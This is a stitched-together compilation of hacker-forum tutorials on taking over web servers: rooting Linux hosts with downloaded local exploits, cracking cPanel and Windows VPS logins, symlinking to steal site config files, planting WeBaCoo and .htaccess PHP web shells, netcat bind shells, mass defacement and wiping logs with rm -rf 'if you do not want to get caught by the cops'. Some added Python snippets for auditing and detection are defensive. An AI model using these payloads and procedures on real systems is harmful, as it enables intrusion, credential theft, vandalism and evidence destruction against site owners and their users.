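# Constructed /etc/crontab excerpt and a fake stat table standing in for the filesystem.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root /bin/cronscript
0 3 * * * root /usr/local/bin/backup.sh --full
@daily root cleanup-tmp
"""
FAKE_STAT = {
    "/bin": (0o040755, 0),
    "/bin/cronscript": (0o100777, 0),          # the -rwxrwxrwx case from the text
    "/usr/local/bin": (0o040755, 0),
    "/usr/local/bin/backup.sh": (0o100755, 0),
}

if __name__ == "__main__":
    for path, issue in audit_crontab(SAMPLE_CRONTAB, stat_of=FAKE_STAT.get):
        print(f"{path}: {issue}")
```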
2. Enumerating all SUID Files
An SUID file is any file that any user group has the privileges to access, read and write on.
What this means for you: you can escalate privileges this way if it is in an important
directory.
You can social-engineer a privileged user.
To find all SUID files, type:
find / -user root -perm -4000 -print
This will show all the SUID files in your terminal. Take your time and check them, as they
can help you to escalate privileges!
3. Brute Forcing
I know what you are thinking after seeing the title, but this is different: the tool we're going to use is
called Rootdabitch.
What is so special about it?

The magic of this tool is that it works in the background, so you can leave it working for days
until you have results... when the password is cracked it will be mailed to you :)
For this, you need phpshell / reverse shell / SSH access to the target to run this tool. You
can get the tool here: Rootdabitch v0.1
Usage:
./rootdabitch.sh [email protected]
For kiddies:
First download rootdabitch to the server:
wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
Extract it by the following cmd:
unzip rootdabitch-0.1.zip
Chmod it to 755:
chmod +x rootdabitch.sh
Finally run the script:
./rootdabitch.sh [email protected]
Simply just chmod it and run the script. If the password is cracked you will get a mail
containing the root password, which will be in the file "passwords.txt" attached to the mail.

LINUX SERVER ROOTING
Hello Hax0rtools.com readers, today I will show you how to root a server.


Root is the administrator of the whole server. If someone gets root access he can do
anything with the server, like delete and copy anything on the server, or deface all the home pages
(massive
deface).

Although there are mainly 3 ways in which you can get into the server, here we will take the
first method, that is by local root exploit.

NEEDS :
 Netcat (Download from Here)
 Shelled site (Best Shellz Here)
 Local root exploit (which you can find it Here Or Download This collection
Here)
STEPS:

 In the Run program type cmd, then type this: cd C:\Program Files\Netcat
(but first save your netcat in that directory).

After that type this: nc -n -l -v -p 443 , and you will get this -



Now open the URL at which you uploaded your shell and then connect it using the
back connect option in the shell (be careful: some shells do not have this option, and
do not use any proxy, Tor or VPN). When the connection is established you will
get something like this -



Now you have successfully connected. Then we have to get the local root exploit,
like now we have 2.6.18-374 2011.

 Now we have to first upload our exploit to a writable folder; simply we can
just change the directory to the /tmp folder, which is a standard writable
folder.
Command to change dir to /tmp: cd /tmp
 To upload your exploit we will use the wget function.
Now type: wget http://www.example.com/exploit.c

Now the exploit will be uploaded to the tmp folder.



(CASE TYPE 1) If you have uploaded your exploit as (exploit.c) then we have to
compile it, so to compile it we will type the following command.

Type: gcc exploit.c -o exploit

Note that in the above command exploit refers to the name of your exploit (exploit.c). So
if it's properly compiled with no errors and warnings then you can proceed, or if you get
an error then find another exploit.

(CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by
typing the command below.

Type: unzip exploit.zip

 After we have done all the above steps correctly, it's time to give permissions, so we will
type the following command
Type: chmod 777 exploit
 Now it's time to run the exploit; to run the exploit we will type the following command
Type: ./exploit

Now the exploit will run and the server will be rooted ;). To check whether we got root we can
type

Type: id or whoami

NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER

If you do not want to get caught by the cops then delete the logs using the following
commands

rm -rf /tmp/logs
rm -rf $HISTFILE

rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

I hope you have learned how to root a server. My next tutorial will be about how to mass
deface after rooting a server.

cPanel Cracking
Things Required :-
 Shelled site (Download Best Shellz Here)
 cPanel Password Cracker (Download; password: www.hax0rtools.com)

Step By Step Tutorial :-
 First open your shell & upload the cPanel password cracker shell.
 Then scroll down & click on User.


 Now after you have clicked on User, below you will get all the usernames of the cPanel. So now move to the next step, which will be to get a good password list for a dictionary attack. After getting it you have to copy the username & paste it in the username field (above) & paste the password list in the password field. Then finally click on Start.

Tip: Password list should be short & effective .

 When the cracking is finished, you will see the result.

 After getting the login info you can log in by going to -> www.site.com:2082 or www.site.com/cpanel

Bypass 403 Forbidden And Can't Read /etc/named.conf Error
Nowadays most Linux servers show this error when you try to symlink on the server. Most servers which show 403 Forbidden also give the can't read named.conf error when you try to symlink using scripts like Symlink_Sa or the Madspot Security Team shell or whatever script is used for automated symlinking.


This can be bypassed by reading /etc/passwd, and Symlink_Sa 3.0 can be used to bypass this.

I will be posting the download links of some shells I will be using in this tutorial.

The best scripts which can bypass the can't read /etc/named.conf error are:

1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based
script )
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
4. Symlink_Sa 3.0 Automated Symlink Script .

Usage: For Config Fucker, Config Killer and the Symlink Pain [~] Perl script, just upload them to the server; make sure that you create a new directory. Upload the script and use the command cat /etc/passwd to read all of /etc/passwd from the server, copy it, open your script, paste it there, click on Get Config and you're done. Just open the link of the folder you created, e.g. for site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there.

Note: It's better to create a php.ini file before you do this for a 100% result.

I will post the download links for all 4 shells I have mentioned.

And I will be using another private shell for this which I won't be giving you all, for priv8 reasons: it's the Mannu Shell coded by Team Indishell, which can bypass the can't read /etc/named.conf error easily. But a 403 Forbidden server can't be bypassed using this shell.

So now if we can't symlink to the public_html/ of the website we can use the Symlink_sa 3.0 script's Symlink Bypass option -


So now we can easily symlink to the /public_html/ path of each website.

Now some servers show a 403 Forbidden error when you try to symlink them, so now let's see how to bypass this.



For the 403 Forbidden error I will be using the following shells:

1. Dhanush Shell coded by Arjun (this shell automatically creates .htaccess, php.ini and ini.php files after you log in).
2. Mannu Shell by Team Indishell (private!).
3. Symlink_sa 3.0 script.

I will be posting the download links of Dhanush shell and Symlink_sa 3.0 (Mannu shell is private, as I already told you).

So what is the trick that lets us bypass 403 Forbidden? It's just the .htaccess and php.ini, which contain the following code:

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

php.ini

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden error:

2.) Open Dhanush Shell, which automatically creates .htaccess, php.ini and ini.php.

3.) Mannu shell to check if we bypassed the 403 error:



4.) Bypassed 403 Forbidden and got access to the public_html/ path.

Bypassed the can't read /etc/named.conf and 403 Forbidden errors.

Backdoor a WEB SERVER WITH WEBACOO
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a (hacked) web server.
WeBaCoo was designed to operate under the radar of modern up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism to execute commands on the compromised server. The obfuscated file communicates via the HTTP Cookie header, validating HTTP requests and responses from the web server.
WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers a "terminal" mode in which the user can establish a remote connection to the server and execute commands with the privileges of the web service.
In many cases, this tool is used when a server does not have Netcat.
INSTALLATION:
git clone git://github.com/anestisb/WeBaCoo.git
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
./webacoo.pl -h

COMMANDS:
1) Create an obfuscated backdoor 'backdoor.php' with default settings:
./webacoo.pl -g -o backdoor.php
2) Create a de-obfuscated backdoor 'raw-backdoor.php' using "transit":
./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Set up a "terminal" connection to the remote host using the default settings:
./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4) Set up a "terminal" connection to the remote host, configuring some arguments:
./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"
5) Set up a "terminal" connection to the remote host via an HTTP proxy:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Set up a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Set up a "terminal" connection to the remote host via Tor and log the activity:
./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
Now, having installed the tool and knowing the commands, we will create the backdoor to get a connection to the web server from the console.
For this case I obtained a (hacked) server where I'll upload the backdoor that I create with the following command:
./webacoo.pl -g -o backdoor.php

The backdoor.php is created and placed in the WeBaCoo folder; then upload the file to the (hacked) server and proceed to connect to the server with the following command:
./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php

The connection to the server is perfect, and you get a very fast connection.
Simple commands:

In this case we type "load" to see the modules that handle the whole server, which are:
1) MySQL-CLI: MySQL Command Line Module:
mysql-cli (ex. 'mysql-cli 10.0.1.11 admin pass')
2) PSQL-CLI: Postgres Command Line Module:
psql-cli (ex. 'testdb psql-cli 10.0.1.12 root pass')
3) Upload: File Upload Module:
upload (ex. 'upload exploit.c /tmp/')
4) Download: File Download Module:
download (ex. 'download config.php')
5) Stealth: Stealth Enhance Module
stealth (ex. 'stealth /var/www/html')

These commands are easy to use; let's do a brief demonstration with the MySQL-CLI command to connect to the server's database.
1) Download the configuration file:
download configuration.php

2) Open the configuration.php file, copy the MySQL user and password, and type the command:
mysql-cli 127.0.0.1:3306 db_user db_password

3) The tool will connect to MySQL; we can then type show databases; to see all the databases.
Similarly use the other commands to upload a local root exploit or download any file from the server.
Now with this tool you no longer need the web server to make a back connection with Netcat, which often fails, in order to connect to a web server.

Web Server Hacking through Command Injection

Hello, folks! Did you know? Command injection is the most dangerous web vulnerability, and it's a little harder to find. Command injection is also called command execution, code injection, or remote code execution. Well, it's my first post on command injection, so I'll start with a basic and simple tutorial; maybe I'll post some advanced techniques in future, depending on my learning. #Command execution is my favorite vulnerability :)


What is Command Injection :
Command injection is one of the most dangerous web vulnerabilities. It occurs when unauthorized commands sent by an attacker are accepted by the web server without proper validation of the client input and passed to the server's operating system, with no filter or whitelist to block unwanted commands, which allows an attacker to run any command on the website server's operating system.

One simple example of command injection: assume that your current computer is a web server. As you all know, every web host needs an operating system, like Linux, Windows, Unix etc., on what is called the server. Every website has its own server and operating system which is connected to the World Wide Web. Cool, now every OS has a terminal, like the Command Prompt in Windows. Now assume that you create a web application that allows any user to ping an IP. Then you definitely have to connect your terminal or command prompt to the web application (because only an OS terminal connected to the WWW can ping a requested IP). Without any filtering and validation of user input, your application blindly trusts the user's request and executes it on the web server's OS terminal. So what if an attacker determines that your application is vulnerable to command injection and sends unauthorized commands to the server terminal? You know he can gain complete access to your web server. It's like you handed your OS terminal to an attacker, and of course if you have control of the OS terminal then you can do anything on the web server: shell upload, website defacement, database takeover, creating multiple vulnerabilities, etc.


Understanding Complete Command Injection :
Fine, guys, if you still didn't understand what exactly command injection is and how it works then here I have a simple tutorial for you. Just follow the steps below and learn command execution in a day.

Requirements :


DVWA Pen-testing lab or OWASP BWA - (DVWA)
Basic knowledge of Windows CMD and Linux Terminal
Little Networking Knowledge
Burp Suite (Not Recommended)
Brain!
Simple Command Execution tutorial for Beginners :
I'm gonna show you a simple command execution tutorial through the OWASP BWA (DVWA) pentest lab that runs on a virtual machine; we'll execute our commands on the server and will be able to take down the complete website.

As you know DVWA is already vulnerable to command execution (for pentesting), so we don't need to find it; we directly determine the OS and execute commands.

Now, in the image below you can see that Burp Suite found server information:

Or, you can also use Nmap for more information:



If you have a little knowledge of networking you can easily understand what it is and how things work. If you want to learn networking, click here.

To become an expert in command execution you have to learn Linux, Python, Perl, C and DOS programming languages, not completely, but you must know about 40% to 50%. So guys, back to the injection attack.

Open the DVWA Command Injection vulnerability page. As I told you, the DVWA web app allows anyone to ping an IP, and that is connected to the command prompt (check the source code to know how the web app works).



Try to understand how exactly it works and what we have to do to hack the web server. As you know, the complete server can be compromised via the Command Prompt or terminal. Normally we use this command to ping an IP using the Command Prompt in Windows: "ping WEBSITE YOU WANT TO PING"



The DVWA web application does the same, which means we are effectively on the Command Prompt, and as you saw in the source code it doesn't have any type of filter to filter the user's input and save the server from command injection attacks.
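As an added example (not from the original post or from DVWA itself), here is the ping pattern the tutorial describes, written in Python: the vulnerable form glues the request parameter into a shell command line, while the hardened form only accepts an IP literal or a syntactically valid hostname and runs ping with an argument list and no shell, so metacharacters such as "&" can never start a second command. The function names and the hostname rule are this example's own assumptions.

```python
import ipaddress
import re
import subprocess

# RFC 1123 host labels: letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def vulnerable_ping_command(target):
    """What the DVWA-style code effectively does: the raw parameter is glued
    into a single string that a shell will later interpret. Returned as a
    string for inspection only; never run this form."""
    return "ping -c 1 " + target


def validate_target(target):
    """Accept only an IP literal or a syntactically valid hostname.
    Anything carrying shell metacharacters, whitespace or path pieces
    fails both checks and is rejected."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid ping target: %r" % target)


def safe_ping_argv(target):
    """Build an argv list. With no shell involved, '&', ';', '|' or backticks
    would be passed to ping as a literal argument even if validation were
    somehow bypassed, instead of spawning a second command."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target, timeout=5):
    """Run the hardened form (no shell=True) and return (returncode, output)."""
    proc = subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode, proc.stdout + proc.stderr


if __name__ == "__main__":
    attempt = "127.0.0.1 & ls"          # the probe the tutorial uses
    print("vulnerable form passes to the shell:", vulnerable_ping_command(attempt))
    try:
        safe_ping_argv(attempt)
    except ValueError as exc:
        print("hardened form rejects it:", exc)
    print("hardened argv:", safe_ping_argv("127.0.0.1"))
```

Both halves matter: the allowlist stops the request at the boundary, and the argument-list form means a future validation bug still cannot turn one ping into two commands.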


Now give DVWA a try with one IP request to see how it works.

I pinged the IP 127.0.0.1 to see how it works, and it simply works. Now we can use some evil mind to compromise the web server with command injection. Check the vulnerability with the "& ls" command. In general we use "ls" to get the list of files and folders in the directory.

Now any noob can understand that we got complete access to the web server's command prompt, so an attacker can easily compromise the server totally. Let's try with this command: "& cd ../../../../../../../../WINDOWS/system32 & dir". You'll get a huge page with the complete directory names, files and folders; you can also search for cmd.exe.




Now, how to hack the complete web server and get the database and all the files; we can even gain root access. We just need to upload our backdoor. Click here to learn how to upload the C99 PHP shell backdoor and hack a website using command execution.


Thank you for reading our post. Stay tuned with us and please share it to help us grow, and always feel free to comment and let me know your problem.

How To Hack Windows Servers Using DuBrute 2.2
Hello,

Today I'm sharing with you how to hack many, many Windows VPSs.

All you need is two pieces of software, called DuBrute and Vnc_scanner, to hack VPSs.
Download Links :
Vnc_scanner : Here
DuBrute : Here
How to Use ?

1) Download both files from the links above.
2) Extract both files anywhere on your PC.
3) Open the Vnc_scanner folder.
4) Open the exe file called vnc_scanner_gui.exe.



5) Select any country.
6) Click on Get Dial List.
After the whole IP list has come up:

7) Click on Start Scan.



After that it will scan for working VPS IPs.

After the scan has finished, click on Start parser. It will save the good IPs in a new text file called IPs.txt.

Now you need to get the usernames and passwords for the scanned IPs. For that you have to use the hacking software called DuBrute.

1) Open the DuBrute folder.
2) Copy the IPs.txt file from the vnc_scanner folder and paste it in the DuBrute folder.
3) Open DUBrute.exe.



4) Click on Generation.
5) Check the image below.

1st, click on File ip, then select the text file called IPs.txt and click Open.
2nd, select File Login then Open, and then File Pass and Open.
3rd, click on Make and press OK.
Then click on Exit.

Now press Start in your DuBrute.

Let it brute-force the combinations. When a working VPS matches an IP, username and password, it will be saved in the DuBrute folder in a file called goog.txt

Like this:
This image shows that I found 3 working VPSs.

Note : Both files have a virus; your anti-virus detects them as a Trojan etc. So when you download them, if your anti-virus is active then it will delete your files. If you want to use them then you have to turn off your anti-virus, or you can hack VPSs from a VPS like me. I downloaded these files on a VPS and hacked it ;P. I used this software to hack VPSs over the last 1-2 weeks. I hacked around 100 working VPSs.

This is a detailed tutorial about how to hack VPSs. Should you have more doubts on this, feel free to reply here. I'm here to help you.

Thanks and good luck to all for hacking many, many VPSs.
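Both the cPanel dictionary attack described earlier and the DuBrute password guessing against the scanned VPS list leave the same trace on the target: a burst of failed logons from one source, sometimes against several usernames, occasionally followed by a success. The block below is an added detection example, not part of either tutorial: it runs a sliding-window rule over a constructed, normalised authentication feed (the line layout, thresholds and addresses are this example's own assumptions; in practice cPanel's login log and the Windows logon-failure events would first be mapped into this shape).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, normalised authentication events. Layout is this example's own
# assumption; all addresses and names are invented.
SAMPLE_AUTH_LOG = """\
2014-12-22 09:00:01 cpanel 203.0.113.7 admin FAILED
2014-12-22 09:00:02 cpanel 203.0.113.7 admin FAILED
2014-12-22 09:00:03 cpanel 203.0.113.7 admin FAILED
2014-12-22 09:00:04 cpanel 203.0.113.7 admin FAILED
2014-12-22 09:00:05 cpanel 203.0.113.7 admin FAILED
2014-12-22 09:00:06 cpanel 203.0.113.7 admin FAILED
2014-12-22 09:00:07 cpanel 203.0.113.7 admin OK
2014-12-22 09:05:00 cpanel 198.51.100.4 alice FAILED
2014-12-22 09:05:30 cpanel 198.51.100.4 alice OK
2014-12-22 11:00:00 rdp 192.0.2.9 Administrator FAILED
2014-12-22 11:03:00 rdp 192.0.2.9 admin FAILED
2014-12-22 11:06:00 rdp 192.0.2.9 user FAILED
2014-12-22 11:09:00 rdp 192.0.2.9 test FAILED
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<service>\S+) "
    r"(?P<src>\S+) (?P<user>\S+) (?P<result>OK|FAILED)$"
)


def parse_auth_log(text):
    """Parse the normalised lines into event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                           "service": m["service"], "src": m["src"],
                           "user": m["user"], "result": m["result"]})
    return events


def detect_bruteforce(text, max_failures=5, window_seconds=60, spray_users=3):
    """Return one alert per (rule, service, source). Rules:
    burst: >= max_failures failures from one source inside window_seconds;
    spray: one source failing against >= spray_users distinct usernames;
    success_after_failures: a success from a source still inside a burst,
    which is the one an incident responder needs to see first."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # (service, src) -> recent failure times
    users = defaultdict(set)        # (service, src) -> usernames attempted
    raised = set()
    alerts = []

    def alert(kind, key, ev):
        if (kind, key) not in raised:
            raised.add((kind, key))
            alerts.append({"type": kind, "service": key[0], "src": key[1],
                           "at": ev["ts"].isoformat(sep=" ")})

    for ev in parse_auth_log(text):
        key = (ev["service"], ev["src"])
        q = failures[key]
        while q and ev["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if ev["result"] == "FAILED":
            q.append(ev["ts"])
            users[key].add(ev["user"])
            if len(q) >= max_failures:
                alert("burst", key, ev)
            if len(users[key]) >= spray_users:
                alert("spray", key, ev)
        elif len(q) >= max_failures:
            alert("success_after_failures", key, ev)
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(a)
```

The slow RDP guesses in the sample never trip the burst rule (they are three minutes apart), which is why the username-count rule is kept alongside it: tools that rotate logins and pace themselves are caught by breadth rather than by rate.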

How to use a VPS

Go to Start > Run > type mstsc and press OK.
Then put in your VPS IP and Connect. Then type your ID and password, then OK.
That's it. You are in the Virtual Private Server.

How to change the password of a VPS?
Press Ctrl + Alt + End and you will see the option to change the password.
Note : You can only change the password if you have permission from the Administrator.
Respect !

Symlink Tutorial for beginners
What do you mean by symbolic links?

In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.

How to do symlink on a web server?

For symlinking you need shell access, like GNY, C99, r57 etc., on the website. It looks like this


Now you need to create a directory with any name, like sym, test etc.

After creating the directory you need 2 files:
1. A blank .txt file in zip format.
2. .htaccess

The txt file should contain this: "/" and save it.
The .htaccess file should contain the code below:

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php

and save it as ".htaccess".

Now you need to upload both files, the zip and the .htaccess. After uploading both files we need to unzip the zip file using this command:

"unzip "file name" "

After unzipping you will see a txt file there. Now you need to open the appropriate path in the web browser.

It looks like this.

Now just click on the 1.txt file that you unzipped from the zip file. After clicking on the 1.txt file it shows all the directories of the web server; check out the image below:



OK, done. Now in symlink we will check the directory path, like

1. /home/"Website Username"/public_html/
2. /hsphere/local/home/c283273/

There are different paths; you just need to check them out.

If you click on "Home" you will get a 403 error, which means Forbidden, but never mind; after you get this error you need to add the "Website Username".

To find the web users you need to execute this command

cat /etc/passwd

The path is "/home/"website username"/public_html/"

After executing the cat command it looks like the image above.

Now just find a specific target that has an ADMIN LOGIN PAGE and a CONFIG FILE.

How do you find this specific target site?

You need the server IP and www.bing.com


To find Joomla, WordPress and PHP sites we can use these dorks:
1. ip: 123.x.x.x index.php?option=
2. ip: 123.x.x.x "Powered By WordPress"
3. ip: 123.x.x.x .php?id=
and more......

Having found the target site, you now need to find the config file. In Joomla the config file name is "configuration.php", in WordPress "wp-config.php", etc.

You cannot directly see the file using a URL like this

www.Target.com/wp-config.php
www.Target.com/configuration.php

But when we symlink to the specific target we can show the config file using right click and view source.

It looks like the image above.

This config file includes the site's database information like database name, username, password etc. After getting this you can log in to the site's database and you can edit or delete specific columns, fields etc.
But we need to change the admin password. In many cases the password is in MD5, base64 etc. encrypted form. You need to decrypt it... that's it.

After changing the password you know what to do...!!!
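The technique above only works when the web server will follow a symlink out of one account's public_html into another account's files. On Apache the server-side fix is `Options -FollowSymLinks +SymLinksIfOwnerMatch` (a link is followed only when link and target have the same owner); the audit side is to find links that already escape a document root. The following is an added example, not part of the tutorial: it walks a docroot without following links and reports every symlink whose resolved target lies outside it, using a constructed layout built in a temporary directory (the paths and file names are this example's own).

```python
import os
import tempfile
from pathlib import Path


def find_escaping_symlinks(docroot):
    """Walk docroot without following links and report every symlink whose
    final target resolves outside docroot. Returns [(link_rel_path, target)]."""
    root = Path(docroot).resolve()
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            target = link.resolve()      # follows link chains; tolerates dangling links
            if target != root and root not in target.parents:
                hits.append((str(link.relative_to(root)), str(target)))
    return hits


def demo():
    """Build a constructed layout in a temp dir: one site's docroot, a
    neighbouring account's config file, a symlink that reaches across to it
    and a benign link that stays inside the docroot. Returns the findings."""
    base = Path(tempfile.mkdtemp(prefix="symcheck-"))
    docroot = base / "home" / "victim" / "public_html"
    (docroot / "assets").mkdir(parents=True)
    (docroot / "sym").mkdir()
    (docroot / "index.html").write_text("<h1>site</h1>\n")
    other = base / "home" / "neighbour" / "public_html"
    other.mkdir(parents=True)
    (other / "wp-config.php").write_text("<?php /* constructed placeholder */ ?>\n")
    os.symlink(other / "wp-config.php", docroot / "sym" / "cfg.txt")   # escapes docroot
    os.symlink(docroot / "assets", docroot / "img")                    # stays inside
    return find_escaping_symlinks(docroot)


if __name__ == "__main__":
    for rel, target in demo():
        print("escaping symlink: %s -> %s" % (rel, target))
```

`os.walk(..., followlinks=False)` still lists a symlinked directory in `dirnames`, which is why the check runs over both `dirnames` and `filenames`; it just never descends through the link, so a link pointing back up the tree cannot cause an infinite walk.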

MASS DEFACE TUTORIAL
Today I will tell you how to mass deface in a few steps, so let's start.

Things Required:
 Rooted server (check the how to root a Linux server tutorial: Here)
 Mass deface script (Download from Here; password: www.hax0rtools.com)
Step By Step Guide :
 First we have to download our mass deface file, so as usual we will use the wget command
Type: wget www.somesite.in/massdeface.zip
 As we have downloaded it as a zip file, now we will unzip it by typing
Type: unzip massdeface.zip

 Once you have unzipped it, we will now run the script by typing
Type: perl massdeface.pl
 After we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so we have to run it accordingly, but before we do so we have to download our deface page using wget.
Type: wget http://www.somesite.com/index.html




So once we have downloaded our deface page, we will run the final command to mass deface.
Type: perl massdeface.pl /tmp/index.html

ATTACKING WEBSERVERS VIA .HTACCESS

A while back I was testing a CMS that had a curious feature: all uploaded files were placed in their own directory. This was not a security enhancement, as the application allowed PHP files to be uploaded. However I couldn't help asking, what if PHP uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self-contained .htaccess web shells. I wrote both a PHP and a server-side include shell, but other options can easily be added (JSP, mod_perl, etc.).


This works by first overriding the default Apache .htaccess access restriction from within the .htaccess file so we can access it as a URL. Next we reconfigure the .htaccess extension to be treated as a dynamic content script, and finally we have our payload. The attack works because the parsing and processing of Apache configuration directives in .htaccess occur before the .htaccess file is processed as a web request. There is a relatively small gotcha: the payload has to be commented out with a # at the start so it doesn't get interpreted by Apache, and likewise the script interpreter must ignore the Apache directives. PHP lends itself well to this as any content not within the <?php ?> tags is presented as is.

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo " \n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######



Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the URL http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files is accessible from my github htshells repository.
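The trick relies on two things a defender controls: the upload handler accepting a file named `.htaccess` at all, and Apache honouring per-directory overrides in the upload location (`AllowOverride None` on that directory makes Apache ignore any .htaccess file there, whatever it contains). The following is an added example of the first control, not code from the htshells project or the CMS mentioned above: a filename policy that rejects dotfiles, path components and any handler-triggering extension anywhere in the name (Apache matches `AddHandler`/`AddType` against every `.ext` segment, so `photo.php.jpg` is as dangerous as `shell.php`), plus storage under a random name. The allow- and deny-lists are this example's own assumptions.

```python
import os
import re
import secrets

# Extensions this (hypothetical) upload handler is willing to store.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Extensions that must not appear in any segment of the name.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                         "shtml", "shtm", "cgi", "pl", "py", "jsp", "asp", "aspx"}

# Server configuration files that should never be writable via upload.
RESERVED_NAMES = {"php.ini", "web.config"}

SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


def upload_name_problems(filename):
    """Return the list of reasons a client-supplied filename is rejected;
    an empty list means it passed every check."""
    problems = []
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename:
        problems.append("path components")
    if not base or base.startswith("."):
        problems.append("dotfile or empty name")      # .htaccess, .htpasswd, .user.ini
    if not SAFE_NAME_RE.match(base):
        problems.append("disallowed characters")
    if base.lower() in RESERVED_NAMES:
        problems.append("reserved configuration file name")
    parts = base.lower().split(".")
    exts = parts[1:] if len(parts) > 1 else []
    if not exts or exts[-1] not in ALLOWED_EXTENSIONS:
        problems.append("extension not allowed")
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        problems.append("executable extension in name")
    return problems


def stored_name(filename):
    """Discard the client-supplied name entirely and keep only the validated
    final extension behind a random token, so nothing the client chose can
    reach the filesystem or an Apache handler match."""
    problems = upload_name_problems(filename)
    if problems:
        raise ValueError("rejected upload name %r: %s" % (filename, ", ".join(problems)))
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for name in [".htaccess", "shell.php", "photo.php.jpg", "photo.jpg"]:
        print("%-16s -> %s" % (name, upload_name_problems(name) or "accepted"))
    print("stored as:", stored_name("photo.jpg"))
```

Renaming is the part that survives configuration drift: even if someone later re-enables overrides for the upload directory, a file stored as `<32 hex chars>.jpg` is still not a `.htaccess` file and carries no PHP extension.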

How to Backconnect with netcat


1. You need to download these:

netcat windows - http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell - http://www.multiupload.nl/TOBD6TAOXE

2. Upload nc with the shell.
3. Set chmod 777 for nc:

Quote:
chmod 777 nc

4. Run the command ./nc -vv -l -p [port] -e /bin/bash in the shell:

Quote:
./nc -vv -l -p 4499 -e /bin/bash



5. Open cmd, change to the directory where nc is saved (like this: cd c:\)
and run this command: nc -vv [ip target] [port]

Quote:
C:\>nc -vv ip server 4499


6. Now you have a back connection.

Hacking Cold Fusion Servers - Part I
